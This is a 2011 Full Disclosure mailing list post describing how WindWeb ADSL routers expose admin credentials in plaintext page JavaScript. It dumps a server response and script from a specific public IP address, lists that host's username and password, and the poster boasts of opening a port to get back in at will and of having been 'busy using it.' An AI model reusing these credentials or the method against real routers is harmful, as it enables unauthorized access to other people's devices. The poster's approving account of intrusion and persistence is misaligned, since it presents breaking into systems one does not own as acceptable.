Full Disclosure mailing list archives
WindWeb HTTPD add admin / html page insertion
From: xD 0x41 <secn3t () gmail com>
Date: Tue, 13 Sep 2011 06:21:28 +1000
Hello! just a quick one on a webserver used primarily and mainly in Korea. WindWeb server / router. This is an ADSL router wich handles 4meg/s and these routers are all the same, can overrite the admin just like this.. demo/poc: ok lets find a windweb... here i have simply dumped sniffed traffic... easy as! scanning takes time :P 220.76.166.73:80: - "501 Not Implemented Server: WindWeb/2.0 Connection: close Content-Type: text/html Web Server Error Report:<HR> <H1>Server Error: 501 Not Implemented</H1> Operating System Error Nr:3997697: errno = 0x3d0001 <P><HR><H2>No RPM for this combination of URL and method</H2><P><P><HR><H1>/doc/flowctrl.htm</H1><P>" Ok lets look and oops, this aint good, admin pass is changeable in html.. also lets makesure we open port 80 and allow myself in a back. <SCRIPT LANGUAGE="JavaScript"> var st_lan_ip = new Array(4) var st_lan_subnet = new Array(4) var st_lan_mac = new Array(4) st_lan_ip[0] = "192.168.1.1" st_lan_subnet[0] = "255.255.255.0" st_lan_mac[0] = "00:05:C6:3A:1A:45" var st_lan_active = "1" <!-- var id = new Array(); id[0]="adsl" id[1]="user" var pass = new Array(); pass[0]="megapass" pass[1]="megapass" 220.76.166.73 U:adsl P:Megapass Now I can access the port 80 and open it so i get back inside wen i like... this was just to easy... cmon isp's lift your game... plaintext and, albeit this is old now but i have been busy using it you see.. anyhow have a happy route. xd
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- WindWeb HTTPD add admin / html page insertion xD 0x41 (Sep 12)